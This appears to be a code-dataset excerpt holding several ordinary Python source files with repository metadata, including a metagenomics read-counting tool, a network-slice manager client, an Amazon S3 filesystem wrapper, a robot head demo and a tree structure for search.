write_input(
path=output,
frames=frames,
meta={
"name": args.name,
"description": args.description,
"authors": args.authors,
"references": args.references,
},
cutoff=args.cutoff,
)
if __name__ == "__main__":
main()
| 65 | 0 | 26 |
080538794e45ef5bbfa6060102fca96fc9120d38 | 7,410 | py | Python | FunTaxaCount/src/funtaxacount.py | PNNL-CompBio/kansas-native-prairie | 40e24da4b0b89d7a568b0c4c8d94a3f6da3ea766 | [
"BSD-3-Clause"
] | null | null | null | FunTaxaCount/src/funtaxacount.py | PNNL-CompBio/kansas-native-prairie | 40e24da4b0b89d7a568b0c4c8d94a3f6da3ea766 | [
"BSD-3-Clause"
] | null | null | null | FunTaxaCount/src/funtaxacount.py | PNNL-CompBio/kansas-native-prairie | 40e24da4b0b89d7a568b0c4c8d94a3f6da3ea766 | [
"BSD-3-Clause"
] | null | null | null | import pandas as pd
import numpy as np
import argparse, sys, re
orf_names = ['ORF_ID', 'Contig', 'COG', 'KO'] #, 'product']
def merge_orf_and_funtax( orf_file, funtax_file ):
"""
Takes an orf file and a funtaxa file and returns the merge
"""
orf_df = pd.read_table(orf_file, header=None, names=orf_names, index_col='ORF_ID', usecols=orf_names, engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df = pd.read_table(funtax_file, index_col='ORF_ID', engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df[['COG','KO']] = orf_df[['COG','KO']]
funtax_df['taxonId'] = funtax_df['taxonomy'].replace(r'.+\(([0-9]+)\)', value=r'\1', regex=True)
genes = funtax_df.reset_index()
genes['gene'] = genes['ORF_ID']
return genes.set_index('gene')
def generate_gff( mapfile, funtax_orf_file ):
"""
Takes the mapfile and annotation file and generates a gff file that maps reads in the bamfile to genes
"""
annotation2assembly_map = pd.read_table(mapfile,
names=['annotation','assembly','length'],
index_col='annotation')
funtax_gff = pd.read_table( funtax_orf_file.name, engine='python', encoding='ISO-8859-1', quoting=3)
funtax_gff['seqid'] = funtax_gff.join(annotation2assembly_map, on='Contig_Name')['assembly']
funtax_gff['source'] = 'Prodigal_v2.00'
funtax_gff['type'] = 'CDS'
funtax_gff['score'] = 100.0
funtax_gff['phase'] = 0
funtax_gff['attributes'] = funtax_gff['ORF_ID'].str.replace(r'(.*)', r'ID=\1;')
return funtax_gff[['seqid','source', 'type','start', 'end', 'score', 'strand','phase','attributes']]
| 47.806452 | 156 | 0.652901 | import pandas as pd
import numpy as np
import argparse, sys, re
orf_names = ['ORF_ID', 'Contig', 'COG', 'KO'] #, 'product']
def merge_orf_and_funtax( orf_file, funtax_file ):
"""
Takes an orf file and a funtaxa file and returns the merge
"""
orf_df = pd.read_table(orf_file, header=None, names=orf_names, index_col='ORF_ID', usecols=orf_names, engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df = pd.read_table(funtax_file, index_col='ORF_ID', engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df[['COG','KO']] = orf_df[['COG','KO']]
funtax_df['taxonId'] = funtax_df['taxonomy'].replace(r'.+\(([0-9]+)\)', value=r'\1', regex=True)
genes = funtax_df.reset_index()
genes['gene'] = genes['ORF_ID']
return genes.set_index('gene')
def get_function_counts( function, orf_file, funtax_file, read_count_file ):
genes = merge_orf_and_funtax( orf_file, funtax_file )
read_counts = pd.read_table( read_count_file, index_col='gene', engine='python')
read_counts[function] = genes[function]
function_counts = read_counts.groupby(function).sum()
#if function = 'ec':
# ecs_df = pd.read_table(ec_file, index_col='EC')
# return pd.concat([ec_df, function_counts], axis=1, join_axes=[function_counts.index])
return function_counts
def reindex_contig_gene_id( contig_id ):
return lambda match_obj: 'ID={}_{};'.format( contig_id, int(match_obj.group(2)) - 1 )
def map_seqid(annotation2assembly_file, gff_in, gff_out, map_id_p = False):
cgRE = re.compile(r'ID=([0-9]+)_([0-9]+);')
annotation2assembly_map = pd.read_table(annotation2assembly_file,
names=['annotation','assembly','length'],index_col='annotation')
with gff_out as out:
for line in open(gff_in.name, 'r', encoding='ISO-8859-1'):
m = line.split('\t')
newline = line
if len(m) > 8 and m[0] in annotation2assembly_map.index:
newline = annotation2assembly_map.loc[m[0],'assembly'] + '\t' + '\t'.join(m[1:])
if map_id_p:
newline = cgRE.sub( reindex_contig_gene_id( m[0] ), newline )
out.write(newline)
def generate_gff( mapfile, funtax_orf_file ):
"""
Takes the mapfile and annotation file and generates a gff file that maps reads in the bamfile to genes
"""
annotation2assembly_map = pd.read_table(mapfile,
names=['annotation','assembly','length'],
index_col='annotation')
funtax_gff = pd.read_table( funtax_orf_file.name, engine='python', encoding='ISO-8859-1', quoting=3)
funtax_gff['seqid'] = funtax_gff.join(annotation2assembly_map, on='Contig_Name')['assembly']
funtax_gff['source'] = 'Prodigal_v2.00'
funtax_gff['type'] = 'CDS'
funtax_gff['score'] = 100.0
funtax_gff['phase'] = 0
funtax_gff['attributes'] = funtax_gff['ORF_ID'].str.replace(r'(.*)', r'ID=\1;')
return funtax_gff[['seqid','source', 'type','start', 'end', 'score', 'strand','phase','attributes']]
def get_funtaxa_counts( funtax_file, orf_file, read_count_file, ncbi_tree_file, ncbi_megan_map_file, merged_file, rank, function ):
ncbi_tree = get_ncbi_tree( ncbi_tree_file )
ncbi_megan_map = get_ncbi_megan_map( ncbi_megan_map_file )
genes = merge_orf_and_funtax( orf_file, funtax_file )
read_counts = pd.read_table( read_count_file, index_col='gene', engine='python')
read_counts['taxonId'] = check_merged( genes['taxonId'], merged_file )
read_counts[function] = genes[function]
fun_taxon_counts = read_counts.groupby(['taxonId', function]).sum().reset_index()
fun_taxon_counts[rank] = fun_taxon_counts['taxonId'].apply( lambda x: get_rank( ncbi_tree, x, rank ) )
fun_rank_counts = fun_taxon_counts.drop('taxonId', axis=1).groupby([rank, function]).sum()
fun_rank_counts.insert(0, 'ancestry', pd.Series([get_ancestry(ncbi_tree, r, ncbi_megan_map )
for (r, f) in fun_rank_counts.index],
index=fun_rank_counts.index))
return fun_rank_counts.dropna()
def get_read_counts(read_count_files ):
read_count_array = []
header = []
for read_count_file in read_count_files:
header.append(read_count_file.name)
read_count_array.append(pd.read_table( read_count_file, index_col=0,header=None, names=['gene',header[-1]]))
return pd.concat(read_count_array, axis=1)
def check_merged( taxonId, merged_file ):
merged_dict = get_merged_map( merged_file )
taxonId = pd.to_numeric(taxonId, errors= 'coerce')
return taxonId.apply( lambda x: merged_dict.get(x,x))
def get_rank_counts( funtax_file, orf_file, read_count_file, ncbi_tree_file, ncbi_megan_map_file, merged_file, rank ):
ncbi_tree = get_ncbi_tree( ncbi_tree_file )
ncbi_megan_map = get_ncbi_megan_map( ncbi_megan_map_file )
genes = merge_orf_and_funtax( orf_file, funtax_file )
read_counts = pd.read_table( read_count_file, index_col='gene', engine='python')
read_counts['taxonId'] = check_merged( genes['taxonId'], merged_file )
taxon_counts = read_counts.groupby('taxonId').sum().reset_index()
taxon_counts[rank] = taxon_counts['taxonId'].apply( lambda x: get_rank( ncbi_tree, x, rank ) )
rank_counts = taxon_counts.drop('taxonId', axis=1).groupby( rank ).sum().reset_index()
#Insert ancestry into this column
rank_counts.insert(0, 'ancestry', rank_counts[rank].apply( lambda x: get_ancestry(ncbi_tree, x, ncbi_megan_map ) ) )
return rank_counts.set_index(rank).dropna()
def get_merged_map( merged_file ):
return pd.read_table( merged_file ,
header=None, sep=r'\t\|',
names=['tax_id','merged_tax_id'],
engine='python',
index_col=0,usecols=[0,1]).to_dict()['merged_tax_id']
def get_ncbi_megan_map( meganfile ):
ncbi_megan_map = {}
for line in meganfile:
fields = line.split("\t")
taxonId, taxonName = int(fields[0].strip()), fields[1].strip()
ncbi_megan_map[taxonId] = taxonName
return ncbi_megan_map
def get_ncbi_tree( ncbi_tree_file ):
return pd.read_table( ncbi_tree_file,
header=None, sep=r'\t\|\t',
names=['tax_id','parent tax_id','rank'],
engine='python',
index_col=0,usecols=[0,1,2])
def get_rank( ncbi_tree, tax_id, rank):
old_id = -1
try:
current_id = int(tax_id)
except ValueError:
return tax_id
while current_id in ncbi_tree.index and current_id != old_id:
if ncbi_tree.loc[current_id, 'rank'] == rank:
return current_id
else:
old_id = current_id
current_id = ncbi_tree.loc[current_id, 'parent tax_id']
return current_id
def get_ancestry( ncbi_tree, taxon_id, ncbi_megan_map ):
ancestry = []
old_id = -1
try:
current_id = int(taxon_id)
except ValueError:
return np.nan
while current_id in ncbi_tree.index and current_id != old_id:
old_id = current_id
current_id = ncbi_tree.loc[current_id, 'parent tax_id']
ancestry.insert(0, old_id )
return ';'.join([ ncbi_megan_map[i] for i in ancestry if i in ncbi_megan_map])
| 5,420 | 0 | 275 |
6220278fb5beb386dbd23cda33aaad7304f286d1 | 511 | py | Python | pettingzoo/mappo_ssd/stag_hunt_gw_v1.py | footoredo/PettingZoo | b48baf9ca459d72cdcb7013ef86c5fc470856081 | [
"MIT"
] | null | null | null | pettingzoo/mappo_ssd/stag_hunt_gw_v1.py | footoredo/PettingZoo | b48baf9ca459d72cdcb7013ef86c5fc470856081 | [
"MIT"
] | null | null | null | pettingzoo/mappo_ssd/stag_hunt_gw_v1.py | footoredo/PettingZoo | b48baf9ca459d72cdcb7013ef86c5fc470856081 | [
"MIT"
] | null | null | null | from .utils.env import make_env, GridWorldParallelEnv
| 51.1 | 119 | 0.661448 | from .utils.env import make_env, GridWorldParallelEnv
class parallel_env(GridWorldParallelEnv):
def __init__(self, max_frames, share_reward, shape_reward, shape_beta, choose=0, length=5, **kwargs):
super(parallel_env, self).__init__(env_name='StagHuntGW', num_agents=2, max_frames=max_frames,
share_reward=share_reward, shape_reward=shape_reward, shape_beta=shape_beta,
choose=choose, length=length, **kwargs)
| 386 | 20 | 49 |
e6cd3d976574d61338e1d130ac3d717197a58ae5 | 1,873 | py | Python | tests/generators/ssz_generic/main.py | BenSchZA/eth2.0-specs | 1235e58a8db09efd058f31087d53d91b97b83011 | [
"CC0-1.0"
] | 1 | 2021-05-11T09:42:58.000Z | 2021-05-11T09:42:58.000Z | tests/generators/ssz_generic/main.py | amaraka/eth2.0-specs | 1564f6217f50da6c74a815340de24ac62a26851b | [
"CC0-1.0"
] | null | null | null | tests/generators/ssz_generic/main.py | amaraka/eth2.0-specs | 1564f6217f50da6c74a815340de24ac62a26851b | [
"CC0-1.0"
] | null | null | null | from typing import Iterable
from eth2spec.gen_helpers.gen_base import gen_runner, gen_typing
import ssz_basic_vector
import ssz_bitlist
import ssz_bitvector
import ssz_boolean
import ssz_uints
import ssz_container
from eth2spec.test.helpers.constants import PHASE0
if __name__ == "__main__":
gen_runner.run_generator("ssz_generic", [
create_provider("basic_vector", "valid", ssz_basic_vector.valid_cases),
create_provider("basic_vector", "invalid", ssz_basic_vector.invalid_cases),
create_provider("bitlist", "valid", ssz_bitlist.valid_cases),
create_provider("bitlist", "invalid", ssz_bitlist.invalid_cases),
create_provider("bitvector", "valid", ssz_bitvector.valid_cases),
create_provider("bitvector", "invalid", ssz_bitvector.invalid_cases),
create_provider("boolean", "valid", ssz_boolean.valid_cases),
create_provider("boolean", "invalid", ssz_boolean.invalid_cases),
create_provider("uints", "valid", ssz_uints.valid_cases),
create_provider("uints", "invalid", ssz_uints.invalid_cases),
create_provider("containers", "valid", ssz_container.valid_cases),
create_provider("containers", "invalid", ssz_container.invalid_cases),
])
| 40.717391 | 95 | 0.70315 | from typing import Iterable
from eth2spec.gen_helpers.gen_base import gen_runner, gen_typing
import ssz_basic_vector
import ssz_bitlist
import ssz_bitvector
import ssz_boolean
import ssz_uints
import ssz_container
from eth2spec.test.helpers.constants import PHASE0
def create_provider(handler_name: str, suite_name: str, case_maker) -> gen_typing.TestProvider:
def prepare_fn(configs_path: str) -> str:
return "general"
def cases_fn() -> Iterable[gen_typing.TestCase]:
for (case_name, case_fn) in case_maker():
yield gen_typing.TestCase(
fork_name=PHASE0,
runner_name='ssz_generic',
handler_name=handler_name,
suite_name=suite_name,
case_name=case_name,
case_fn=case_fn
)
return gen_typing.TestProvider(prepare=prepare_fn, make_cases=cases_fn)
if __name__ == "__main__":
gen_runner.run_generator("ssz_generic", [
create_provider("basic_vector", "valid", ssz_basic_vector.valid_cases),
create_provider("basic_vector", "invalid", ssz_basic_vector.invalid_cases),
create_provider("bitlist", "valid", ssz_bitlist.valid_cases),
create_provider("bitlist", "invalid", ssz_bitlist.invalid_cases),
create_provider("bitvector", "valid", ssz_bitvector.valid_cases),
create_provider("bitvector", "invalid", ssz_bitvector.invalid_cases),
create_provider("boolean", "valid", ssz_boolean.valid_cases),
create_provider("boolean", "invalid", ssz_boolean.invalid_cases),
create_provider("uints", "valid", ssz_uints.valid_cases),
create_provider("uints", "invalid", ssz_uints.invalid_cases),
create_provider("containers", "valid", ssz_container.valid_cases),
create_provider("containers", "invalid", ssz_container.invalid_cases),
])
| 608 | 0 | 23 |
1be4a2d461562127f4eacd1e1f8cade75021cbaf | 3,718 | py | Python | slice_subnet_mapper/slice_subnet_mapper.py | INSPIRE-5Gplus/i5p-netslice-mgr | c5cefabfa6ce20a6c94519eb5b1778583f82ac73 | [
"Apache-2.0"
] | null | null | null | slice_subnet_mapper/slice_subnet_mapper.py | INSPIRE-5Gplus/i5p-netslice-mgr | c5cefabfa6ce20a6c94519eb5b1778583f82ac73 | [
"Apache-2.0"
] | 2 | 2021-08-25T13:54:03.000Z | 2021-08-25T14:20:06.000Z | slice_subnet_mapper/slice_subnet_mapper.py | INSPIRE-5Gplus/i5p-netslice-mgr | c5cefabfa6ce20a6c94519eb5b1778583f82ac73 | [
"Apache-2.0"
] | null | null | null | #!/usr/local/bin/python3.4
import os, sys, logging, json, argparse, time, datetime, requests, uuid
from config_files import settings
#### NETWORK SLICE MANAGER/NFVO URL
JSON_CONTENT_HEADER = {'Content-Type':'application/json'}
#### REQUESTS
# returns all the slice-subnets templates in the NSM
# returns a specific slice-subnet template in the NSM
# returns all slice-subnet instances in the NSM
# returns specific slice-subnet instance in the NSM
# sends request to deploy a slice-subnet template (NST) to the NSM
# returns specific slice-subnet instance request from the NSM/NFVO
# sends request to terminate a slice-subnet template (NST) to the NSM
| 43.741176 | 124 | 0.733728 | #!/usr/local/bin/python3.4
import os, sys, logging, json, argparse, time, datetime, requests, uuid
from config_files import settings
#### NETWORK SLICE MANAGER/NFVO URL
JSON_CONTENT_HEADER = {'Content-Type':'application/json'}
def get_nsm_url():
nsm_ip = os.environ.get("NSM_IP")
nsm_port = os.environ.get("NSM_PORT")
nfvo_url = "http://"+ str(nsm_ip) +":"+ str(nsm_port) +"/api/v3"
return nfvo_url
#### REQUESTS
# returns all the slice-subnets templates in the NSM
def get_all_slice_subnet_templates():
settings.logger.info('SUBNET_MAPPER: Requests all local slice-subnet templates information.')
url = get_nsm_url() + "/slices"
response = requests.get(url, headers=JSON_CONTENT_HEADER)
return response.text, response.status_code
# returns a specific slice-subnet template in the NSM
def get_slice_subnet_template(slice_ID):
settings.logger.info('SUBNET_MAPPER: Requests local slice-subnet template information. ID: ' + str(slice_ID))
url = get_nsm_url() + "/slices/" + str(slice_ID)
response = requests.get(url, headers=JSON_CONTENT_HEADER)
return response.text, response.status_code
# returns all slice-subnet instances in the NSM
def get_all_slice_subnet_instances():
settings.logger.info('SUBNET_MAPPER: Requests all local slice-subnet instances information.')
url = get_nsm_url() + "/slice-instances"
response = requests.get(url, headers=JSON_CONTENT_HEADER)
return response.text, response.status_code
# returns specific slice-subnet instance in the NSM
def get_slice_subnet_instance(instance_ID):
settings.logger.info('SUBNET_MAPPER: Requests local slice-subnet instance information. ID: ' + str(instance_ID))
url = get_nsm_url() + "/slice-instances/" + str(instance_ID)
response = requests.get(url, headers=JSON_CONTENT_HEADER)
return response.text, response.status_code
# sends request to deploy a slice-subnet template (NST) to the NSM
def instantiate_slice_subnet(data_json):
#settings.logger.info('SUBNET_MAPPER: Starts local deployment (TIME 2): ' + str(time.time_ns()))
settings.logger.info("SUBNET_MAPPER: Requests local slice-subnet deployment.")
data_dumps = json.dumps(data_json)
url = get_nsm_url() + "/requests"
response = requests.post(url, headers=JSON_CONTENT_HEADER, data=data_dumps)
jsonresponse = json.loads(response.text)
#id_sample = str(uuid.uuid4())
response = {}
response['id'] = jsonresponse['id']
return response, 200
# returns specific slice-subnet instance request from the NSM/NFVO
def get_slice_subnet_instance_request(request_ID):
time.sleep(5)
url = get_nsm_url() + "/requests/" + str(request_ID)
response = requests.get(url, headers=JSON_CONTENT_HEADER)
jsonresponse = json.loads(response.text)
return jsonresponse, response.status_code
#settings.logger.info('SUBNET_MAPPER: Requests local slice-subnet instance REQUEST information. ID: ' + str(request_ID))
#sample_json = {}
#sample_json['instance_uuid'] = str(uuid.uuid4())
#sample_json['status'] = "INSTANTIATED"
#time.sleep(10)
#settings.logger.info('SUBNET_MAPPER: THE ANSWER!!!! ' + str(sample_json))
#return sample_json, 200
# sends request to terminate a slice-subnet template (NST) to the NSM
def terminate_slice_subnet(data_json):
settings.logger.info("SUBNET_MAPPER: Requests local slice-subnet termination.")
data_dumps = json.dumps(data_json)
#url = get_nsm_url() + "/requests"
#response = requests.post(url, headers=JSON_CONTENT_HEADER, data=data_dumps)
#return response.text, response.status_code
id_sample = str(uuid.uuid4())
response = {}
response['id'] = id_sample
return response, 200
| 2,879 | 0 | 176 |
7c3036b10fff4b82c4b096c60d9c6b2baf89c51d | 6,483 | py | Python | rastervision/filesystem/s3_filesystem.py | ValRat/raster-vision | 90f4c5d99869466c65fa972fa8f08f68c1102820 | [
"Apache-2.0"
] | 4 | 2019-03-11T12:38:15.000Z | 2021-04-06T14:57:52.000Z | rastervision/filesystem/s3_filesystem.py | ValRat/raster-vision | 90f4c5d99869466c65fa972fa8f08f68c1102820 | [
"Apache-2.0"
] | null | null | null | rastervision/filesystem/s3_filesystem.py | ValRat/raster-vision | 90f4c5d99869466c65fa972fa8f08f68c1102820 | [
"Apache-2.0"
] | 1 | 2021-02-25T18:23:27.000Z | 2021-02-25T18:23:27.000Z | import io
import os
import subprocess
from datetime import datetime
from urllib.parse import urlparse
from rastervision.filesystem import (FileSystem, NotReadableError,
NotWritableError)
# Code from https://alexwlchan.net/2017/07/listing-s3-keys/
def get_matching_s3_objects(bucket, prefix='', suffix=''):
"""
Generate objects in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch objects whose key starts with
this prefix (optional).
:param suffix: Only fetch objects whose keys end with
this suffix (optional).
"""
import boto3
s3 = boto3.client('s3')
kwargs = {'Bucket': bucket}
# If the prefix is a single string (not a tuple of strings), we can
# do the filtering directly in the S3 API.
if isinstance(prefix, str):
kwargs['Prefix'] = prefix
while True:
# The S3 API response is a large blob of metadata.
# 'Contents' contains information about the listed objects.
resp = s3.list_objects_v2(**kwargs)
try:
contents = resp['Contents']
except KeyError:
return
for obj in contents:
key = obj['Key']
if key.startswith(prefix) and key.endswith(suffix):
yield obj
# The S3 API is paginated, returning up to 1000 keys at a time.
# Pass the continuation token into the next response, until we
# reach the final page (when this field is missing).
try:
kwargs['ContinuationToken'] = resp['NextContinuationToken']
except KeyError:
break
def get_matching_s3_keys(bucket, prefix='', suffix=''):
"""
Generate the keys in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch keys that start with this prefix (optional).
:param suffix: Only fetch keys that end with this suffix (optional).
"""
for obj in get_matching_s3_objects(bucket, prefix, suffix):
yield obj['Key']
| 32.742424 | 79 | 0.600956 | import io
import os
import subprocess
from datetime import datetime
from urllib.parse import urlparse
from rastervision.filesystem import (FileSystem, NotReadableError,
NotWritableError)
# Code from https://alexwlchan.net/2017/07/listing-s3-keys/
def get_matching_s3_objects(bucket, prefix='', suffix=''):
"""
Generate objects in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch objects whose key starts with
this prefix (optional).
:param suffix: Only fetch objects whose keys end with
this suffix (optional).
"""
import boto3
s3 = boto3.client('s3')
kwargs = {'Bucket': bucket}
# If the prefix is a single string (not a tuple of strings), we can
# do the filtering directly in the S3 API.
if isinstance(prefix, str):
kwargs['Prefix'] = prefix
while True:
# The S3 API response is a large blob of metadata.
# 'Contents' contains information about the listed objects.
resp = s3.list_objects_v2(**kwargs)
try:
contents = resp['Contents']
except KeyError:
return
for obj in contents:
key = obj['Key']
if key.startswith(prefix) and key.endswith(suffix):
yield obj
# The S3 API is paginated, returning up to 1000 keys at a time.
# Pass the continuation token into the next response, until we
# reach the final page (when this field is missing).
try:
kwargs['ContinuationToken'] = resp['NextContinuationToken']
except KeyError:
break
def get_matching_s3_keys(bucket, prefix='', suffix=''):
"""
Generate the keys in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch keys that start with this prefix (optional).
:param suffix: Only fetch keys that end with this suffix (optional).
"""
for obj in get_matching_s3_objects(bucket, prefix, suffix):
yield obj['Key']
class S3FileSystem(FileSystem):
@staticmethod
def get_session():
# Lazily load boto
import boto3
return boto3.Session()
@staticmethod
def matches_uri(uri: str, mode: str) -> bool:
parsed_uri = urlparse(uri)
return parsed_uri.scheme == 's3'
@staticmethod
def file_exists(uri: str) -> bool:
# Lazily load boto
import botocore
s3 = S3FileSystem.get_session().resource('s3')
parsed_uri = urlparse(uri)
bucket = parsed_uri.netloc
key = parsed_uri.path[1:]
try:
s3.Object(bucket, key).load()
except botocore.exceptions.ClientError as e:
return False
return True
@staticmethod
def read_str(uri: str) -> str:
return S3FileSystem.read_bytes(uri).decode('utf-8')
@staticmethod
def read_bytes(uri: str) -> bytes:
import botocore
s3 = S3FileSystem.get_session().client('s3')
parsed_uri = urlparse(uri)
with io.BytesIO() as file_buffer:
try:
s3.download_fileobj(parsed_uri.netloc, parsed_uri.path[1:],
file_buffer)
return file_buffer.getvalue()
except botocore.exceptions.ClientError as e:
raise NotReadableError('Could not read {}'.format(uri)) from e
@staticmethod
def write_str(uri: str, data: str) -> None:
data = bytes(data, encoding='utf-8')
S3FileSystem.write_bytes(uri, data)
@staticmethod
def write_bytes(uri: str, data: bytes) -> None:
s3 = S3FileSystem.get_session().client('s3')
parsed_uri = urlparse(uri)
bucket = parsed_uri.netloc
key = parsed_uri.path[1:]
with io.BytesIO(data) as str_buffer:
try:
s3.upload_fileobj(str_buffer, bucket, key)
except Exception as e:
raise NotWritableError('Could not write {}'.format(uri)) from e
@staticmethod
def sync_from_dir(src_dir_uri: str,
dest_dir_uri: str,
delete: bool = False) -> None: # pragma: no cover
command = ['aws', 's3', 'sync', src_dir_uri, dest_dir_uri]
if delete:
command.append('--delete')
subprocess.run(command)
@staticmethod
def sync_to_dir(src_dir_uri: str, dest_dir_uri: str,
delete: bool = False) -> None: # pragma: no cover
command = ['aws', 's3', 'sync', src_dir_uri, dest_dir_uri]
if delete:
command.append('--delete')
subprocess.run(command)
@staticmethod
def copy_to(src_path: str, dst_uri: str) -> None:
s3 = S3FileSystem.get_session().client('s3')
parsed_uri = urlparse(dst_uri)
if os.path.isfile(src_path):
try:
s3.upload_file(src_path, parsed_uri.netloc,
parsed_uri.path[1:])
except Exception as e:
raise NotWritableError(
'Could not write {}'.format(dst_uri)) from e
else:
S3FileSystem.sync_to_dir(src_path, dst_uri, delete=True)
@staticmethod
def copy_from(uri: str, path: str) -> None:
import botocore
s3 = S3FileSystem.get_session().client('s3')
parsed_uri = urlparse(uri)
try:
s3.download_file(parsed_uri.netloc, parsed_uri.path[1:], path)
except botocore.exceptions.ClientError:
raise NotReadableError('Could not read {}'.format(uri))
@staticmethod
def local_path(uri: str, download_dir: str) -> None:
parsed_uri = urlparse(uri)
path = os.path.join(download_dir, 's3', parsed_uri.netloc,
parsed_uri.path[1:])
return path
@staticmethod
def last_modified(uri: str) -> datetime:
parsed_uri = urlparse(uri)
bucket, key = parsed_uri.netloc, parsed_uri.path[1:]
s3 = S3FileSystem.get_session().client('s3')
head_data = s3.head_object(Bucket=bucket, Key=key)
return head_data['LastModified']
@staticmethod
def list_paths(uri, ext=''):
parsed_uri = urlparse(uri)
bucket = parsed_uri.netloc
prefix = os.path.join(parsed_uri.path[1:])
keys = get_matching_s3_keys(bucket, prefix, suffix=ext)
return [os.path.join('s3://', bucket, key) for key in keys]
| 3,770 | 639 | 23 |
6121daeffe4f654f25b1707e220d87cce2b7e556 | 249 | py | Python | example/python/permissions/can_transfer.py | akshatkarani/iroha | 5acef9dd74720c6185360d951e9b11be4ef73260 | [
"Apache-2.0"
] | 1,467 | 2016-10-25T12:27:19.000Z | 2022-03-28T04:32:05.000Z | example/python/permissions/can_transfer.py | akshatkarani/iroha | 5acef9dd74720c6185360d951e9b11be4ef73260 | [
"Apache-2.0"
] | 2,366 | 2016-10-25T10:07:57.000Z | 2022-03-31T22:03:24.000Z | example/python/permissions/can_transfer.py | akshatkarani/iroha | 5acef9dd74720c6185360d951e9b11be4ef73260 | [
"Apache-2.0"
] | 662 | 2016-10-26T04:41:22.000Z | 2022-03-31T04:15:02.000Z | #
# Copyright Soramitsu Co., Ltd. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
import can_receive
# Please see example for can_receive permission.
# By design can_receive and can_transfer permissions
# can be tested only together.
| 22.636364 | 52 | 0.779116 | #
# Copyright Soramitsu Co., Ltd. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
import can_receive
# Please see example for can_receive permission.
# By design can_receive and can_transfer permissions
# can be tested only together.
| 0 | 0 | 0 |
1a117e69ab35215f8f86142f15d32d060e0b9e3b | 1,232 | py | Python | cse481wi18/applications/scripts/head_demo.py | TimAdamson21/access_teleop | 4ca4cc3ebc29cb4942cec5c8e3e60b897b80590c | [
"MIT"
] | null | null | null | cse481wi18/applications/scripts/head_demo.py | TimAdamson21/access_teleop | 4ca4cc3ebc29cb4942cec5c8e3e60b897b80590c | [
"MIT"
] | null | null | null | cse481wi18/applications/scripts/head_demo.py | TimAdamson21/access_teleop | 4ca4cc3ebc29cb4942cec5c8e3e60b897b80590c | [
"MIT"
] | null | null | null | #! /usr/bin/env python
import rospy
import fetch_api
def wait_for_time():
"""Wait for simulated time to begin.
"""
while rospy.Time().now().to_sec() == 0:
pass
if __name__ == '__main__':
main()
| 23.692308 | 75 | 0.578734 | #! /usr/bin/env python
import rospy
import fetch_api
def print_usage():
print 'Usage:'
print ' rosrun applications head_demo.py look_at FRAME_ID X Y Z'
print ' rosrun applications head_demo.py pan_tilt PAN_ANG TILT_ANG'
print 'Examples:'
print ' rosrun applications head_demo.py look_at base_link 1 0 0.3'
print ' rosrun applications head_demo.py pan_tilt 0 0.707'
def wait_for_time():
"""Wait for simulated time to begin.
"""
while rospy.Time().now().to_sec() == 0:
pass
def main():
rospy.init_node('head_demo')
wait_for_time()
argv = rospy.myargv()
if len(argv) < 2:
print_usage()
return
command = argv[1]
head = fetch_api.Head()
if command == 'look_at':
if len(argv) < 6:
print_usage()
return
frame_id, x, y, z = argv[2], float(argv[3]), float(argv[4]), float(
argv[5])
head.look_at(frame_id, x, y, z)
elif command == 'pan_tilt':
if len(argv) < 4:
print_usage()
return
pan, tilt = float(argv[2]), float(argv[3])
head.pan_tilt(pan, tilt)
else:
print_usage()
if __name__ == '__main__':
main()
| 961 | 0 | 46 |
7669c07f7d4e2bfe8db49af295ec775218fd092b | 1,806 | py | Python | tree.py | captaincapsaicin/castle | fd0a042b5ca2aa017cdbe69688595f771bae8f59 | [
"MIT"
] | null | null | null | tree.py | captaincapsaicin/castle | fd0a042b5ca2aa017cdbe69688595f771bae8f59 | [
"MIT"
] | 1 | 2017-11-25T00:35:40.000Z | 2017-11-25T00:35:40.000Z | tree.py | captaincapsaicin/castle | fd0a042b5ca2aa017cdbe69688595f771bae8f59 | [
"MIT"
] | null | null | null |
def create_new_connection(parent_node, child_node, action, prior_probability):
"""
Returns the edge connecting parent and child
"""
edge = Edge(parent_node, child_node, action, prior_probability)
parent_node.add_outgoing_edge(edge)
child_node.add_incoming_edge(edge)
return edge
| 31.137931 | 119 | 0.633444 | class Node(object):
def __init__(self, state, outgoing_edges=None, in_edge=None):
self.state = state
if outgoing_edges is not None:
self.outgoing_edges = outgoing_edges
else:
self.outgoing_edges = []
self.in_edge = in_edge
self.is_expanded = False
self.is_terminal = False
def add_outgoing_edge(self, edge):
self.outgoing_edges.append(edge)
def add_outgoing_edges(self, edges):
self.outgoing_edges.extend(edges)
def add_incoming_edge(self, edge):
self.in_edge = edge
def __repr__(self):
return 'Node. Children: {} State: {}'.format([edge.out_node.state for edge in self.outgoing_edges], self.state)
class Edge(object):
def __init__(self,
in_node,
out_node,
action,
prior_probability,
num_visits=0,
total_action_value=0.0):
self.in_node = in_node
self.out_node = out_node # node
self.action = action
self.num_visits = num_visits
self.total_action_value = total_action_value
self.prior_probability = prior_probability
@property
def mean_action_value(self):
if self.num_visits == 0:
return 0.0
return self.total_action_value / self.num_visits
def __repr__(self):
return 'Edge. In: {} Out: {} Action: {}'.format(self.in_node.state, self.out_node.state, self.action)
def create_new_connection(parent_node, child_node, action, prior_probability):
"""
Returns the edge connecting parent and child
"""
edge = Edge(parent_node, child_node, action, prior_probability)
parent_node.add_outgoing_edge(edge)
child_node.add_incoming_edge(edge)
return edge
| 1,227 | 90 | 179 |
4d325da1cd3ad6f9e3e55cc011c11ddb5f61afbf | 16,093 | py | Python | ioflo/base/skedding.py | BradyHammond/ioflo | 177ac656d7c4ff801aebb0d8b401db365a5248ce | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 128 | 2015-01-14T12:26:56.000Z | 2021-11-06T07:09:29.000Z | ioflo/base/skedding.py | BradyHammond/ioflo | 177ac656d7c4ff801aebb0d8b401db365a5248ce | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 17 | 2015-01-28T18:26:50.000Z | 2020-11-19T22:08:06.000Z | ioflo/base/skedding.py | BradyHammond/ioflo | 177ac656d7c4ff801aebb0d8b401db365a5248ce | [
"ECL-2.0",
